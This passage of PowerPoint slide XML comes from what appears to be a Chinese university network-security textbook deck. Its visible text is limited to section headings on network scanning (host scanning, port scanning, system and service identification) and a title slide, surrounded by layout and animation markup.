                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="69900">
                                          <p:val>
                                            <p:fltVal val="45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="39" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="216"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>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 grpId="0"/>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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1847711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1415026" y="-203755"/>
              <a:ext cx="1187251" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3531870"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4331970"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.2 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5132070"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.3 系统识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="5932170"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.4 服务识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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图片 7" descr="V-136038-F72FEC97O"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="4876800" cy="1009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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007BD3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="034373"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin scaled="0"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="3810"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="4021455" cy="301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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56007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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
